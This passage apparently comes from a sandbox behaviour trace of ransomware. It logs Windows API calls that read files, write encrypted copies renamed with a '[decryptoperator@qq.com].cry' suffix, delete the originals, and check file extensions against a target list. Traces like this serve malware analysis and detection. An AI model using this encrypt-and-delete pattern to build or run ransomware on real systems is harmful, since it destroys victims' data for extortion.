Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0050.326] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0050.326] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0x0) returned 1 [0050.326] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0050.326] ReadFile (in: hFile=0x1c4, lpBuffer=0x3b70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b70058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0050.337] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0xa2200, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0050.337] ReadFile (in: hFile=0x1c4, lpBuffer=0x3bb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bb0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0050.358] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x301fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0050.358] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x1a6600, lpNewFilePointer=0x0, dwMoveMethod=0x301fc2c | out: lpNewFilePointer=0x0) returned 1 [0050.358] ReadFile (in: hFile=0x1c4, lpBuffer=0x3bf0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x301fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bf0058*, lpNumberOfBytesRead=0x301fc38*=0x40000, lpOverlapped=0x0) returned 1 [0050.385] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.385] WriteFile (in: hFile=0x1c4, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xc0108, lpNumberOfBytesWritten=0x301fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fcb0*=0xc0108, lpOverlapped=0x0) returned 1 [0050.408] SetEndOfFile (hFile=0x1c4) returned 1 [0050.408] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x3f34090 [0050.411] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0050.411] WriteFile (in: hFile=0x1c4, lpBuffer=0x3f34090*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f34090*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0050.536] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0xa2200, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0050.536] WriteFile (in: hFile=0x1c4, lpBuffer=0x3f34090*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f34090*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0050.538] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x1a6600, lpNewFilePointer=0x0, dwMoveMethod=0x301fc7c | out: lpNewFilePointer=0x0) returned 1 [0050.538] WriteFile (in: hFile=0x1c4, lpBuffer=0x3f34090*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x301fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f34090*, lpNumberOfBytesWritten=0x301fc88*=0x40000, lpOverlapped=0x0) returned 1 [0050.539] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3f34090 | out: hHeap=0x600000) returned 1 [0050.542] CloseHandle (hObject=0x1c4) returned 1 [0050.543] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0050.543] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0050.543] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0050.543] lstrlenW (lpString=".doc") returned 4 [0050.543] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0050.543] lstrlenW (lpString=".docx") returned 5 [0050.543] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0050.543] lstrlenW (lpString=".pdf") returned 4 [0050.543] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0050.543] lstrlenW (lpString=".xls") returned 4 [0050.543] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0050.543] lstrlenW (lpString=".xlsx") returned 5 [0050.543] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0050.543] lstrlenW (lpString=".ppt") returned 4 [0050.543] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0050.543] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0050.543] lstrlenW (lpString=".zip") returned 4 [0050.543] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0050.543] lstrlenW (lpString=".rar") returned 4 [0050.543] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0050.543] lstrlenW (lpString=".bz2") returned 4 [0050.543] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0050.543] lstrlenW (lpString=".7z") returned 3 [0050.543] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0050.543] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0050.543] lstrlenW (lpString=".dbf") returned 4 [0050.543] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0050.543] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0050.544] lstrlenW (lpString=".1cd") returned 4 [0050.544] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0050.544] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0050.544] lstrlenW (lpString=".jpg") returned 4 [0050.544] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0050.544] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0050.544] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0050.544] lstrlenW (lpString=".doc") returned 4 [0050.544] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0050.544] lstrlenW (lpString=".docx") returned 5 [0050.544] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0050.544] lstrlenW (lpString=".pdf") returned 4 [0050.544] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0050.544] lstrlenW (lpString=".xls") returned 4 [0050.544] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0050.544] lstrlenW (lpString=".xlsx") returned 5 [0050.544] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0050.544] lstrlenW (lpString=".ppt") returned 4 [0050.544] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0050.544] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0050.544] lstrlenW (lpString=".zip") returned 4 [0050.544] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0050.544] lstrlenW (lpString=".rar") returned 4 [0050.544] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0050.544] lstrlenW (lpString=".bz2") returned 4 [0050.544] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0050.544] lstrlenW (lpString=".7z") returned 3 [0050.544] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0050.544] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0050.544] lstrlenW (lpString=".dbf") returned 4 [0050.544] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0050.544] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0050.544] lstrlenW (lpString=".1cd") returned 4 [0050.544] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0050.544] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0050.544] lstrlenW (lpString=".jpg") returned 4 [0050.544] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0050.545] lstrcmpiW (lpString1=".exe", lpString2=".cry") returned 1 [0050.545] lstrlenW (lpString="setup.exe") returned 9 [0050.545] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0050.716] GetFileSizeEx (in: hFile=0x1ac, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=1377656) returned 1 [0050.718] CloseHandle (hObject=0x1ac) returned 1 [0050.718] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe")) returned 0x2020 [0050.718] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0050.718] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ac [0050.718] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.718] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.718] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0050.718] GetLastError () returned 0x0 [0050.719] ReadFile (in: hFile=0x1ac, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x301fed4*=0xffff0, lpOverlapped=0x0) returned 1 [0050.793] WriteFile (in: hFile=0x208, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0051.262] ReadFile (in: hFile=0x1ac, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x301fed4*=0x50588, lpOverlapped=0x0) returned 1 [0051.297] WriteFile (in: hFile=0x208, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0x50590, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fc9c*=0x50590, lpOverlapped=0x0) returned 1 [0051.307] ReadFile (in: hFile=0x1ac, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x301fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.307] WriteFile (in: hFile=0x208, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0051.307] SetEndOfFile (hFile=0x208) returned 1 [0051.307] CloseHandle (hObject=0x208) returned 1 [0051.313] SetFilePointerEx (in: hFile=0x1ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.314] SetEndOfFile (hFile=0x1ac) returned 1 [0051.416] CloseHandle (hObject=0x1ac) returned 1 [0051.416] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0051.416] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe")) returned 1 [0051.417] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0051.417] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0051.417] lstrlenW (lpString=".doc") returned 4 [0051.417] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0051.417] lstrlenW (lpString=".docx") returned 5 [0051.417] lstrcmpiW (lpString1=".docx", lpString2="p.exe") returned -1 [0051.417] lstrlenW (lpString=".pdf") returned 4 [0051.417] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0051.417] lstrlenW (lpString=".xls") returned 4 [0051.417] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0051.417] lstrlenW (lpString=".xlsx") returned 5 [0051.417] lstrcmpiW (lpString1=".xlsx", lpString2="p.exe") returned -1 [0051.417] lstrlenW (lpString=".ppt") returned 4 [0051.417] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0051.417] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0051.417] lstrlenW (lpString=".zip") returned 4 [0051.417] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0051.417] lstrlenW (lpString=".rar") returned 4 [0051.417] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0051.417] lstrlenW (lpString=".bz2") returned 4 [0051.417] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0051.417] lstrlenW (lpString=".7z") returned 3 [0051.417] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0051.417] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0051.417] lstrlenW (lpString=".dbf") returned 4 [0051.417] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0051.417] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0051.417] lstrlenW (lpString=".1cd") returned 4 [0051.417] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0051.417] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0051.417] lstrlenW (lpString=".jpg") returned 4 [0051.417] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0051.417] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0051.417] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0051.417] lstrlenW (lpString=".doc") returned 4 [0051.417] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0051.417] lstrlenW (lpString=".docx") returned 5 [0051.418] lstrcmpiW (lpString1=".docx", lpString2="p.exe") returned -1 [0051.418] lstrlenW (lpString=".pdf") returned 4 [0051.418] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0051.418] lstrlenW (lpString=".xls") returned 4 [0051.418] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0051.418] lstrlenW (lpString=".xlsx") returned 5 [0051.418] lstrcmpiW (lpString1=".xlsx", lpString2="p.exe") returned -1 [0051.418] lstrlenW (lpString=".ppt") returned 4 [0051.418] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0051.418] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0051.418] lstrlenW (lpString=".zip") returned 4 [0051.418] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0051.418] lstrlenW (lpString=".rar") returned 4 [0051.418] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0051.418] lstrlenW (lpString=".bz2") returned 4 [0051.418] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0051.418] lstrlenW (lpString=".7z") returned 3 [0051.418] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0051.418] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0051.418] lstrlenW (lpString=".dbf") returned 4 [0051.418] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0051.418] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0051.418] lstrlenW (lpString=".1cd") returned 4 [0051.418] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0051.418] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0051.418] lstrlenW (lpString=".jpg") returned 4 [0051.418] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0051.418] lstrcmpiW (lpString1=".HLP", lpString2=".cry") returned 1 [0051.418] lstrlenW (lpString="EQNEDT32.HLP") returned 12 [0051.418] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0051.462] GetFileSizeEx (in: hFile=0x228, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=176311) returned 1 [0051.462] CloseHandle (hObject=0x228) returned 1 [0051.462] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp")) returned 0x20 [0051.462] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0051.462] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0051.462] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.462] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.462] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0051.462] GetLastError () returned 0x0 [0051.462] ReadFile (in: hFile=0x228, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x301fed4*=0x2b0b7, lpOverlapped=0x0) returned 1 [0051.466] WriteFile (in: hFile=0x20c, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0x2b0c0, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fc9c*=0x2b0c0, lpOverlapped=0x0) returned 1 [0051.469] ReadFile (in: hFile=0x228, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x301fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.469] WriteFile (in: hFile=0x20c, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x301fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.469] SetEndOfFile (hFile=0x20c) returned 1 [0051.469] CloseHandle (hObject=0x20c) returned 1 [0051.469] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.469] SetEndOfFile (hFile=0x228) returned 1 [0051.471] CloseHandle (hObject=0x228) returned 1 [0051.471] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0051.471] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp")) returned 1 [0051.471] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0051.471] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0051.471] lstrlenW (lpString=".doc") returned 4 [0051.471] lstrcmpiW (lpString1=".doc", lpString2=".HLP") returned -1 [0051.471] lstrlenW (lpString=".docx") returned 5 [0051.471] lstrcmpiW (lpString1=".docx", lpString2="2.HLP") returned -1 [0051.472] lstrlenW (lpString=".pdf") returned 4 [0051.472] lstrcmpiW (lpString1=".pdf", lpString2=".HLP") returned 1 [0051.472] lstrlenW (lpString=".xls") returned 4 [0051.472] lstrcmpiW (lpString1=".xls", lpString2=".HLP") returned 1 [0051.472] lstrlenW (lpString=".xlsx") returned 5 [0051.472] lstrcmpiW (lpString1=".xlsx", lpString2="2.HLP") returned -1 [0051.472] lstrlenW (lpString=".ppt") returned 4 [0051.472] lstrcmpiW (lpString1=".ppt", lpString2=".HLP") returned 1 [0051.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0051.472] lstrlenW (lpString=".zip") returned 4 [0051.472] lstrcmpiW (lpString1=".zip", lpString2=".HLP") returned 1 [0051.472] lstrlenW (lpString=".rar") returned 4 [0051.472] lstrcmpiW (lpString1=".rar", lpString2=".HLP") returned 1 [0051.472] lstrlenW (lpString=".bz2") returned 4 [0051.472] lstrcmpiW (lpString1=".bz2", lpString2=".HLP") returned -1 [0051.472] lstrlenW (lpString=".7z") returned 3 [0051.472] lstrcmpiW (lpString1=".7z", lpString2="HLP") returned -1 [0051.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0051.472] lstrlenW (lpString=".dbf") returned 4 [0051.472] lstrcmpiW (lpString1=".dbf", lpString2=".HLP") returned -1 [0051.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0051.472] lstrlenW (lpString=".1cd") returned 4 [0051.472] lstrcmpiW (lpString1=".1cd", lpString2=".HLP") returned -1 [0051.472] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0051.472] lstrlenW (lpString=".jpg") returned 4 [0051.472] lstrcmpiW (lpString1=".jpg", lpString2=".HLP") returned 1 [0051.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0051.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0051.473] lstrlenW (lpString=".doc") returned 4 [0051.473] lstrcmpiW (lpString1=".doc", lpString2=".HLP") returned -1 [0051.473] lstrlenW (lpString=".docx") returned 5 [0051.473] lstrcmpiW (lpString1=".docx", lpString2="2.HLP") returned -1 [0051.473] lstrlenW (lpString=".pdf") returned 4 [0051.473] lstrcmpiW (lpString1=".pdf", lpString2=".HLP") returned 1 [0051.473] lstrlenW (lpString=".xls") returned 4 [0051.473] lstrcmpiW (lpString1=".xls", lpString2=".HLP") returned 1 [0051.473] lstrlenW (lpString=".xlsx") returned 5 [0051.473] lstrcmpiW (lpString1=".xlsx", lpString2="2.HLP") returned -1 [0051.473] lstrlenW (lpString=".ppt") returned 4 [0051.473] lstrcmpiW (lpString1=".ppt", lpString2=".HLP") returned 1 [0051.473] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 68 [0051.473] lstrlenW (lpString=".zip") returned 4 [0051.473] lstrcmpiW (lpString1=".zip", lpString2=".HLP") returned 1 [0051.473] lstrlenW (lpString=".rar") returned 4 [0051.473] lstrcmpiW (lpString1=".rar", lpString2=".HLP") returned 1 [0051.473] lstrlenW (lpString=".bz2") returned 4 [0051.473] lstrcmpiW (lpString1=".bz2", lpString2=".HLP") returned 